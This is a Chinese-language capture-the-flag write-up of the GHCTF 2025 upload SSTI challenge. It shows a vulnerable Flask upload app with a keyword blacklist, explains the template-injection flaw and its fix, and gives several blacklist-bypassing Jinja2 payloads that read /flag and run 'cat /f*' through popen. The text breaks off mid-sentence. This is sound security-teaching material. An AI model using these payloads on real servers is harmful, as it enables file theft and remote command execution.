{"id":3053,"date":"2026-03-06T23:53:15","date_gmt":"2026-03-06T15:53:15","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=3053"},"modified":"2026-03-06T23:53:19","modified_gmt":"2026-03-06T15:53:19","slug":"ghctf-2025-upload-ssti","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2026\/03\/06\/ghctf-2025-upload-ssti\/","title":{"rendered":"GHCTF 2025 upload SSTI!"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260305224754-2.png\" alt=\"Pasted image 20260305224754.png\"><\/p>\n<h1>\u4e00\u3001\u8bbf\u95ee\u9898\u76ee<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306214523-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306214523-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306214523.png\"><\/div><br \/>\n\u4e0b\u8f7d\u6e90\u7801app.py<\/p>\n<h1>\u4e8c\u3001\u4ee3\u7801\u5ba1\u8ba1<\/h1>\n<pre><code class=\"language-python\">import os  \nimport re  \n  \nfrom flask import Flask, request, jsonify,render_template_string,send_from_directory, abort,redirect  \nfrom werkzeug.utils import secure_filename  \nimport os  \nfrom werkzeug.utils import secure_filename  \n  \napp = Flask(__name__)  \n  \n# \u914d\u7f6e\u4fe1\u606f  \nUPLOAD_FOLDER = 'static\/uploads'  # \u4e0a\u4f20\u6587\u4ef6\u4fdd\u5b58\u76ee\u5f55  \nALLOWED_EXTENSIONS = {'txt', 'log', 
'text','md','jpg','png','gif'}  \nMAX_CONTENT_LENGTH = 16 * 1024 * 1024  # \u9650\u5236\u4e0a\u4f20\u5927\u5c0f\u4e3a 16MB  \napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER  \napp.config['MAX_CONTENT_LENGTH'] = MAX_CONTENT_LENGTH  \n  \n# \u521b\u5efa\u4e0a\u4f20\u76ee\u5f55\uff08\u5982\u679c\u4e0d\u5b58\u5728\uff09  \nos.makedirs(UPLOAD_FOLDER, exist_ok=True)  \ndef is_safe_path(basedir, path):  \n    return os.path.commonpath([basedir,path])  \n  \n  \ndef contains_dangerous_keywords(file_path):  \n    dangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]  \n  \n    with open(file_path, 'rb') as f:  \n        file_content = str(f.read())  \n  \n  \n        for keyword in dangerous_keywords:  \n            if keyword in file_content:  \n                return True  # \u627e\u5230\u5371\u9669\u5173\u952e\u5b57\uff0c\u8fd4\u56de True  \n    return False  # \u6587\u4ef6\u5185\u5bb9\u4e2d\u6ca1\u6709\u5371\u9669\u5173\u952e\u5b57  \ndef allowed_file(filename):  \n    return '.' 
in filename and \\  \n        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS  \n  \n  \n@app.route('\/', methods=['GET', 'POST'])  \ndef upload_file():  \n    if request.method == 'POST':  \n        # \u68c0\u67e5\u662f\u5426\u6709\u6587\u4ef6\u88ab\u4e0a\u4f20  \n        if 'file' not in request.files:  \n            return jsonify({&quot;error&quot;: &quot;\u672a\u4e0a\u4f20\u6587\u4ef6&quot;}), 400  \n  \n        file = request.files['file']  \n  \n        # \u68c0\u67e5\u662f\u5426\u9009\u62e9\u4e86\u6587\u4ef6  \n        if file.filename == '':  \n            return jsonify({&quot;error&quot;: &quot;\u8bf7\u9009\u62e9\u6587\u4ef6&quot;}), 400  \n  \n        # \u9a8c\u8bc1\u6587\u4ef6\u540d\u548c\u6269\u5c55\u540d  \n        if file and allowed_file(file.filename):  \n            # \u5b89\u5168\u5904\u7406\u6587\u4ef6\u540d  \n            filename = secure_filename(file.filename)  \n            # \u4fdd\u5b58\u6587\u4ef6  \n            save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)  \n            file.save(save_path)  \n  \n  \n  \n            # \u8fd4\u56de\u6587\u4ef6\u8def\u5f84\uff08\u7edd\u5bf9\u8def\u5f84\uff09  \n            return jsonify({  \n                &quot;message&quot;: &quot;File uploaded successfully&quot;,  \n                &quot;path&quot;: os.path.abspath(save_path)  \n            }), 200  \n        else:  \n            return jsonify({&quot;error&quot;: &quot;\u6587\u4ef6\u7c7b\u578b\u9519\u8bef&quot;}), 400  \n  \n    # GET \u8bf7\u6c42\u663e\u793a\u4e0a\u4f20\u8868\u5355\uff08\u53ef\u9009\uff09  \n    return '''  \n    &lt;!doctype html&gt;    &lt;title&gt;Upload File&lt;\/title&gt;    &lt;h1&gt;Upload File&lt;\/h1&gt;    &lt;form method=post enctype=multipart\/form-data&gt;      &lt;input type=file name=file&gt;      &lt;input type=submit value=Upload&gt;    &lt;\/form&gt;    '''  \n@app.route('\/file\/&lt;path:filename&gt;')  \ndef view_file(filename):  \n    try:  \n        # 1. 
\u8fc7\u6ee4\u6587\u4ef6\u540d  \n        safe_filename = secure_filename(filename)  \n        if not safe_filename:  \n            abort(400, description=&quot;\u65e0\u6548\u6587\u4ef6\u540d&quot;)  \n  \n        # 2. \u6784\u9020\u5b8c\u6574\u8def\u5f84  \n        file_path = os.path.join(app.config['UPLOAD_FOLDER'], safe_filename)  \n  \n        # 3. \u8def\u5f84\u5b89\u5168\u68c0\u67e5  \n        if not is_safe_path(app.config['UPLOAD_FOLDER'], file_path):  \n            abort(403, description=&quot;\u7981\u6b62\u8bbf\u95ee\u7684\u8def\u5f84&quot;)  \n  \n        # 4. \u68c0\u67e5\u6587\u4ef6\u662f\u5426\u5b58\u5728  \n        if not os.path.isfile(file_path):  \n            abort(404, description=&quot;\u6587\u4ef6\u4e0d\u5b58\u5728&quot;)  \n  \n        suffix=os.path.splitext(filename)[1]  \n        print(suffix)  \n        if suffix==&quot;.jpg&quot; or suffix==&quot;.png&quot; or suffix==&quot;.gif&quot;:  \n            return send_from_directory(&quot;static\/uploads\/&quot;,filename,mimetype='image\/jpeg')  \n  \n        if contains_dangerous_keywords(file_path):  \n            # \u5220\u9664\u4e0d\u5b89\u5168\u7684\u6587\u4ef6  \n            os.remove(file_path)  \n            return jsonify({&quot;error&quot;: &quot;Waf!!!!&quot;}), 400  \n  \n        with open(file_path, 'rb') as f:  \n            file_data = f.read().decode('utf-8')  \n        tmp_str = &quot;&quot;&quot;&lt;!DOCTYPE html&gt;  \n        &lt;html lang=&quot;zh&quot;&gt;        &lt;head&gt;            &lt;meta charset=&quot;UTF-8&quot;&gt;            &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;            &lt;title&gt;\u67e5\u770b\u6587\u4ef6\u5185\u5bb9&lt;\/title&gt;  \n        &lt;\/head&gt;        &lt;body&gt;            &lt;h1&gt;\u6587\u4ef6\u5185\u5bb9\uff1a{name}&lt;\/h1&gt;  &lt;!-- \u663e\u793a\u6587\u4ef6\u540d --&gt;            &lt;pre&gt;{data}&lt;\/pre&gt;  &lt;!-- \u663e\u793a\u6587\u4ef6\u5185\u5bb9 --&gt;  \n          
  &lt;footer&gt;                &lt;p&gt;&amp;copy; 2025 \u6587\u4ef6\u67e5\u770b\u5668&lt;\/p&gt;  \n            &lt;\/footer&gt;        &lt;\/body&gt;        &lt;\/html&gt;        &quot;&quot;&quot;.format(name=safe_filename, data=file_data)  \n  \n        return render_template_string(tmp_str)  \n  \n    except Exception as e:  \n        app.logger.error(f&quot;\u6587\u4ef6\u67e5\u770b\u5931\u8d25: {str(e)}&quot;)  \n        abort(500, description=&quot;\u6587\u4ef6\u67e5\u770b\u5931\u8d25:{} &quot;.format(str(e)))  \n  \n  \n# \u9519\u8bef\u5904\u7406\uff08\u53ef\u9009\uff09  \n@app.errorhandler(404)  \ndef not_found(error):  \n    return {&quot;error&quot;: error.description}, 404  \n  \n  \n@app.errorhandler(403)  \ndef forbidden(error):  \n    return {&quot;error&quot;: error.description}, 403  \n  \n  \nif __name__ == '__main__':  \n    app.run(&quot;0.0.0.0&quot;,debug=False)\n<\/code><\/pre>\n<ul>\n<li>\u5206\u6790\u4ee3\u7801\uff0c\u53d1\u73b0\u6709ssti\u6ce8\u5165\u7684\u53ef\u80fd<\/li>\n<\/ul>\n<pre><code class=\"language-python\">tmp_str = &quot;&quot;&quot;&lt;!DOCTYPE html&gt;  \n        &lt;html lang=&quot;zh&quot;&gt;        &lt;head&gt;            &lt;meta charset=&quot;UTF-8&quot;&gt;            &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;            &lt;title&gt;\u67e5\u770b\u6587\u4ef6\u5185\u5bb9&lt;\/title&gt;  \n        &lt;\/head&gt;        &lt;body&gt;            &lt;h1&gt;\u6587\u4ef6\u5185\u5bb9\uff1a{name}&lt;\/h1&gt;  &lt;!-- \u663e\u793a\u6587\u4ef6\u540d --&gt;            &lt;pre&gt;{data}&lt;\/pre&gt;  &lt;!-- \u663e\u793a\u6587\u4ef6\u5185\u5bb9 --&gt;  \n            &lt;footer&gt;                &lt;p&gt;&amp;copy; 2025 \u6587\u4ef6\u67e5\u770b\u5668&lt;\/p&gt;  \n            &lt;\/footer&gt;        &lt;\/body&gt;        &lt;\/html&gt;        &quot;&quot;&quot;.format(name=safe_filename, data=file_data)  \n  \n        return 
render_template_string(tmp_str)\n<\/code><\/pre>\n<p><code>render_template<\/code> \u662f\u00a0Flask \u6846\u67b6\u4e2d\u7684\u4e00\u4e2a\u51fd\u6570\uff0c\u7528\u4e8e\u6e32\u67d3 HTML \u6a21\u677f\u3002\u5b83\u63a5\u53d7\u6a21\u677f\u6587\u4ef6\u540d\u4f5c\u4e3a\u7b2c\u4e00\u4e2a\u53c2\u6570\uff0c\u5e76\u53ef\u4ee5\u4f20\u9012\u4e00\u7ec4\u53d8\u91cf\u4f5c\u4e3a\u7b2c\u4e8c\u4e2a\u53c2\u6570\u3002<code>render_template_string()<\/code>\u7684\u4f5c\u7528\u548c\u524d\u8005\u7c7b\u4f3c\uff0c\u4f46\u5b83\u76f4\u63a5\u63a5\u53d7\u5b57\u7b26\u4e32\u800c\u4e0d\u662f\u6a21\u677f\u6587\u4ef6\uff0c\u5e76\u4f7f\u7528 Jinja2 \u6e32\u67d3\u3002\u5728html\u6a21\u677f\u4e2dname\u548cdata\u4f1a\u88ab\u5f53\u505a\u6a21\u677f\u8fdb\u884c\u6e32\u67d3\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u901a\u8fc7\u6ce8\u5165\u6076\u610f\u4ee3\u7801\u4f7f\u5f97\u6076\u610f\u4ee3\u7801\u88ab\u6e32\u67d3\u4ece\u800c\u9020\u6210ssti\u3002\u4fee\u590d\u65f6\u5e94\u628a name \u548c data \u4f5c\u4e3a\u4e0a\u4e0b\u6587\u53d8\u91cf\u4f20\u7ed9 <code>render_template_string<\/code>\uff08\u6a21\u677f\u91cc\u7528 <code>{{ name }}<\/code>\u3001<code>{{ data }}<\/code> \u5f15\u7528\uff09\uff0c\u800c\u4e0d\u662f\u5148\u7528 <code>.format()<\/code> \u628a\u6587\u4ef6\u5185\u5bb9\u62fc\u8fdb\u6a21\u677f\u6e90\u7801\u518d\u6e32\u67d3\uff0c\u8fd9\u6837\u6587\u4ef6\u5185\u5bb9\u53ea\u4f1a\u4f5c\u4e3a\u666e\u901a\u503c\u8f93\u51fa\uff0c\u4e0d\u4f1a\u518d\u88ab\u5f53\u4f5c\u6a21\u677f\u8bed\u6cd5\u89e3\u6790\u3002<\/p>\n<ul>\n<li>\u83b7\u53d6\u6587\u4ef6\u4e0a\u4f20\u540e\u7684\u8def\u5f84<\/li>\n<\/ul>\n<pre><code class=\"language-python\">@app.route('\/file\/&lt;path:filename&gt;')\n\n with open(file_path, 'rb') as f:\n            file_data = f.read().decode('utf-8')\n<\/code><\/pre>\n<p>\u4e0a\u4f20\u6210\u529f\u540e\u8bbf\u95ee\/file\/\u6587\u4ef6\u540d\uff0c\u5e76\u4e14\u4ee5\u4e8c\u8fdb\u5236\u6587\u4ef6\u7684\u683c\u5f0f\u6253\u5f00\u6587\u4ef6\u5e76\u4f7f\u7528utf-8\u7684\u89e3\u7801\u5f62\u5f0f\u8fdb\u884c\u8bfb\u53d6\uff0c\u5982\u679c\u76ee\u6807\u662f\u56fe\u50cf\u6216\u8005\u5176\u5b83\u4e0d\u80fd\u4f7f\u7528utf-8\u89e3\u7801\u5f62\u5f0f\u7684\u6587\u4ef6\uff0c\u89e3\u6790\u4f1a\u62a5\u9519\uff0c\u56e0\u6b64\u9700\u8981\u4e0a\u4f20\u6587\u672c\u7c7b\u578b\u7684\u6587\u4ef6\u3002<\/p>\n<ul>\n<li>waf<\/li>\n<\/ul>\n<pre><code class=\"language-python\">def contains_dangerous_keywords(file_path):  \ndangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]  \n  \nif contains_dangerous_keywords(file_path):  \n    # 
\u5220\u9664\u4e0d\u5b89\u5168\u7684\u6587\u4ef6  \n    os.remove(file_path)  \n    return jsonify({&quot;error&quot;: &quot;Waf!!!!&quot;}), 400\n<\/code><\/pre>\n<p>\u4ee3\u7801\u89c4\u5b9a\u4e86\u9ed1\u540d\u5355\uff0c\u6587\u4ef6\u7684\u5185\u5bb9\u4e2d\u5982\u679c\u5305\u542b\u9ed1\u540d\u5355\u4e2d\u7684\u5b57\u7b26\u5c31\u4f1a\u5220\u9664\u8be5\u6587\u4ef6\u5e76\u62a5\u9519<\/p>\n<h1>\u4e09\u3001waf\u7ed5\u8fc7<\/h1>\n<h2>1.\u4f20\u5165<code>{{7*7}}<\/code><\/h2>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306221120-2.png\" alt=\"Pasted image 20260306221120.png\"><\/p>\n<p>\u6210\u529f\u89e3\u6790\u4e3a49\uff0c\u5b58\u5728\u6f0f\u6d1e<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306221110-2.png\" alt=\"Pasted image 20260306221110.png\"><\/p>\n<h2>2.waf\u7ed5\u8fc7<\/h2>\n<h3>\u65b9\u6cd5\u4e00<\/h3>\n<ul>\n<li>\n<p>\u4f7f\u7528\u5341\u516d\u8fdb\u5236\u7ed5\u8fc7\u654f\u611f\u5b57\u7b26\uff08\u5982flag\u4e2d\u7684\u5b57\u6bcdg\u3001\u4e0b\u5212\u7ebf\uff09<\/p>\n<\/li>\n<li>\n<p>\u65b9\u62ec\u53f7\u00a0<code>[]<\/code>\u66ff\u6362<code>.<\/code>\uff1aPython\u5141\u8bb8\u901a\u8fc7<code>obj[&quot;key&quot;]<\/code>\u7684\u65b9\u5f0f\u8bbf\u95ee\u5c5e\u6027\u6216\u5b57\u5178\u7684\u952e\uff0c\u8fd9\u79cd\u65b9\u5f0f\u7684\u5c5e\u6027\u540d\u88ab\u5305\u88f9\u5728\u5b57\u7b26\u4e32\u4e2d\uff0c\u53ef\u4ee5\u52a8\u6001\u6784\u9020\uff08\u6bd4\u5982\u62fc\u63a5\u6216\u7f16\u7801\uff09\uff0c\u4ece\u800c\u7ed5\u8fc7WAF\u5bf9\u56fa\u5b9a\u6a21\u5f0f\u7684\u8fc7\u6ee4<\/p>\n<\/li>\n<li>\n<p>\u4f7f\u7528Unicode \u7f16\u7801\u7ed5\u8fc7\u654f\u611f\u5b57\u7b26<\/p>\n<\/li>\n<li>\n<p>\u8fc7\u6ee4\u5173\u952e\u5b57\u4f7f\u7528+\u62fc\u63a5\u7ed5\u8fc7<\/p>\n<\/li>\n<li>\n<p>lipsum\u6784\u9020payload<br \/>\n\u8f93\u5165<code>{{lipsum}}<\/code>\u6210\u529f\u89e3\u6790\uff0c\u8bf4\u660e\u8be5\u51fd\u6570\u5b58\u5728<br \/>\n<div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223601-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223601-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306223601.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223139-2.png\" alt=\"Pasted image 20260306223139.png\"><\/p>\n<\/li>\n<\/ul>\n<p>\u5341\u516d\u8fdb\u5236<code>\\x5f<\/code>\u66ff\u6362<code>_<\/code>,\u4e2d\u62ec\u53f7\u66ff\u6362<code>.<\/code>\uff0c\u4f7f\u7528<code>__globals__<\/code>\u51fd\u6570\u67e5\u770b\u5168\u5c40\u53d8\u91cf<\/p>\n<pre><code>{{lipsum[&quot;\\x5f\\x5fglobals\\x5f\\x5f&quot;]}}\n<\/code><\/pre>\n<p>\u8f93\u5165\uff0c\u6210\u529f\u89e3\u6790\uff0c\u83b7\u53d6\u5168\u5c40\u53d8\u91cf<br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223544-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223544-2.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306223544.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223534-2.png\" alt=\"Pasted image 20260306223534.png\"><\/p>\n<p>\u8c03\u7528<code>__builtins__<\/code> \u6a21\u5757\u4ece\u5168\u5c40\u53d8\u91cf\u4e2d\u62ff\u5230 Python \u5185\u7f6e\u51fd\u6570\u5b57\u5178,\u8c03\u7528 open \u51fd\u6570\u8bfb\u53d6 \/flag\u6587\u4ef6\u5185\u5bb9\uff0c\u5341\u516d\u8fdb\u5236<code>\\x67<\/code>\u66ff\u6362g<\/p>\n<pre><code>{{lipsum[&quot;\\x5f\\x5fglobals\\x5f\\x5f&quot;][&quot;\\x5f\\x5fbuiltins\\x5f\\x5f&quot;][&quot;open&quot;](&quot;\/fla\\x67&quot;).read()}}\n<\/code><\/pre>\n<p>\u6e90payload<\/p>\n<pre><code>{{lipsum.__globals__.__builtins__.open('\/flag').read()}}\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306224223-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306224223-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306224223.png\"><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306224232-2.png'><img class=\"lazyload 
lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306224232-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306224232.png\"><\/div><br \/>\n\u6210\u529f\u83b7\u53d6payload<\/p>\n<ul>\n<li><code>''<\/code>\u6784\u9020payload<br \/>\n\u67e5\u770b\u5f53\u524d\u5bf9\u8c61\u6240\u5c5e\u7c7b<\/li>\n<\/ul>\n<pre><code>{{''[&quot;\\x5f\\x5fclass\\x5f\\x5f&quot;]}}\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306225928-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306225928-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306225928.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306225938-2.png\" alt=\"Pasted image 20260306225938.png\"><\/p>\n<p>\u6784\u9020payload\uff1aUnicode 
\u7f16\u7801\uff0c\u8fc7\u6ee4\u5173\u952e\u5b57\u4f7f\u7528+\u62fc\u63a5\u7ed5\u8fc7<\/p>\n<pre><code>{{''[&quot;\\x5f\\x5fclass\\x5f\\x5f&quot;][&quot;\\x5f\\x5fbase\\x5f\\x5f&quot;][&quot;\\x5f\\x5fsub&quot;+&quot;classes\\x5f\\x5f&quot;]()[137][&quot;\\x5f\\x5finit\\x5f\\x5f&quot;][&quot;\\x5f\\x5fglobals\\x5f\\x5f&quot;][&quot;\\x5f\\x5fbuiltins\\x5f\\x5f&quot;]['open']('\/\\u0066\\u006c\\u0061\\u0067').read()}}\n<\/code><\/pre>\n<p>\u6e90payload<\/p>\n<pre><code>{{''.__class__.__base__.__subclasses__()[137].__init__.__globals__.__builtins__.open('\/flag').read()}}\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306230724-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306230724-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306230724.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306230733-2.png\" alt=\"Pasted image 20260306230733.png\"><\/p>\n<h3>\u65b9\u6cd5\u4e8c<\/h3>\n<p>request\u7ed5\u8fc7\uff1a\u9884\u8bbe\u67e5\u8be2\u53c2\u6570+\u4eceurl\u4e2d\u4f20\u9012\u503c\u62fc\u63a5\u7684\u65b9\u6cd5\u6765\u7ed5\u8fc7\u76f4\u63a5\u5bf9\u6a21\u677f\u53c2\u6570\u7684\u8fc7\u6ee4<\/p>\n<p>request\u7ed5\u8fc7\u8be6\u89e3\uff1a<br \/>\nrequest.args.xx \u662f Python \u7684\u00a0Flask \u6846\u67b6\u4e2d\u7528\u4e8e\u8bbf\u95ee URL 
\u67e5\u8be2\u53c2\u6570\u7684\u4e00\u79cd\u65b9\u5f0f\u3002\u5177\u4f53\u6765\u8bf4\uff1a<br \/>\nrequest\u00a0\u662f Flask \u4e2d\u7684\u4e00\u4e2a\u5168\u5c40\u5bf9\u8c61\uff0c\u4ee3\u8868\u5f53\u524d\u7684 HTTP \u8bf7\u6c42\u3002<br \/>\nrequest.args \u662f\u4e00\u4e2a\u7c7b\u5b57\u5178\u7684\u5bf9\u8c61\uff08\u5b9e\u9645\u4e0a\u662f MultiDict\uff09\uff0c\u5b83\u5305\u542b\u4e86 URL \u4e2d\u67e5\u8be2\u5b57\u7b26\u4e32\uff08\u5373 ? \u540e\u9762\u7684\u90e8\u5206\uff09\u4e2d\u7684\u6240\u6709\u53c2\u6570\u3002<br \/>\nxx \u662f\u67e5\u8be2\u53c2\u6570\u7684\u540d\u79f0\uff0c\u901a\u8fc7\u00a0request.args.xx\u00a0\u53ef\u4ee5\u83b7\u53d6\u5bf9\u5e94\u53c2\u6570\u7684\u503c\u3002<br \/>\n\u4f8b\u5982\uff0c\u5982\u679c URL \u662f <code>http:\/\/example.com\/path?param1=value1&amp;param2=value2<\/code>\uff0c\u90a3\u4e48\uff1a<br \/>\n<code>request.args['param1']<\/code> \u8fd4\u56de &#8216;value1&#8217;\u3002<br \/>\n<code>request.args['param2']<\/code> \u8fd4\u56de &#8216;value2&#8217;\u3002<br \/>\n\u5728 Jinja2 \u6a21\u677f\u4e2d\uff0c\u53ef\u4ee5\u76f4\u63a5\u5199 request.args.param1 \u6765\u83b7\u53d6 &#8216;value1&#8217;\u3002<br \/>\n\u7b80\u5355\u6765\u8bf4\uff0crequest.args.xx \u5c31\u662f\u4ece\u00a0URL \u67e5\u8be2\u53c2\u6570\u4e2d\u63d0\u53d6\u540d\u4e3a xx \u7684\u503c\u7684\u4e00\u79cd\u65b9\u6cd5\u3002<\/p>\n<p>\u6784\u9020payload\uff1a<\/p>\n<pre><code>{{''[request.args.x1][request.args.x2][0][request.args.x3]()[137][request.args.x4][request.args.x5]['popen']('cat \/f*').read()}}\n<\/code><\/pre>\n<p>url\uff1a<\/p>\n<pre><code>?x1=__class__&amp;x2=__bases__&amp;x3=__subclasses__&amp;x4=__init__&amp;&amp;x5=__globals__\n<\/code><\/pre>\n<p>\u5c06?\u53ca\u540e\u9762\u5b57\u7b26\u62fc\u63a5\u5230\u6240\u4e0a\u4f20\u6587\u4ef6\u7684url\u540e\u5373\u53ef\uff1a<br 